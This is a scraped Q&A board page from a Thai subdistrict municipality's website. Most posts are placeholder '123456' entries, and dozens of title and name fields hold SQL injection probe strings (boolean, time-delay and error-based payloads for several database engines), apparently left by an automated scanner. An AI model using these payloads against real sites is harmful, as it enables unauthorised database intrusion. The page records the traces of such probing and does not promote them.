:
ยินดีต้อนรับเข้าสู่เทศบาลตำบลเกาะช้างใต้ .... ติดต่อสอบถาม โทรศัพท์/โทรสาร. สำนักปลัด : 039-553059 / กองคลัง : 039-553058 ./ กองช่าง : 039-553060 อีเมล : Saraban@kohchangtai.go.th

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
ทดสอบ(หัวข้อคำถามของท่าน) ชื่อผู็ติดต่อ/หรือผู็แจ้ง 1
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456/**/and+0=0 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456/**/and+2=9 123456 0
123456 123456 0
123456 123456 0
123456'and'e'='e 123456 0
123456 123456 0
123456'and'c'='r 123456 0
123456 123456 0
123456 123456 0
123456"and"l"="l 123456 0
123456 123456 0
123456 123456 0
123456"and"h"="w 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456'and/**/extractvalue(1,concat(char(126),md5(1531777322)))and' 123456 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
123456"and/**/extractvalue(1,concat(char(126),md5(1631509706)))and" 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
extractvalue(1,concat(char(126),md5(1128947282))) 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
123456'and(select'1'from/**/cast(md5(1211867778)as/**/int))>'0 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
123456/**/and/**/cast(md5('1249654157')as/**/int)>0 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1685750995'))) 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1670595808')))>'0 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
123456鎈'"\( 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456'"\( 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
123456 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
123456 123456 0
123456 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
123456 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
123456 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
123456 123456 0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('v',0) 123456 0
123456 123456 0
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('a',2) 123456 0
123456 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 123456 0
123456 123456 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1988576702)))and' 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',2)='u 123456 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1504787115)))and" 0
123456 extractvalue(1,concat(char(126),md5(1215473441))) 0
123456 123456'and(select'1'from/**/cast(md5(1029169346)as/**/int))>'0 0
123456 123456/**/and/**/cast(md5('1587988448')as/**/int)>0 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1980062188'))) 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1723427518')))>'0 0
123456 123456鎈'"\( 0
123456 123456'"\( 0
123456 123456/**/and+1=1 0
123456 123456/**/and+4=9 0
123456 123456'and'u'='u 0
123456 123456'and'r'='f 0
123456 123456"and"c"="c 0
123456 123456"and"n"="v 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
123456 123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('t',0) 0
123456 123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('i',2) 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',2)='h 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0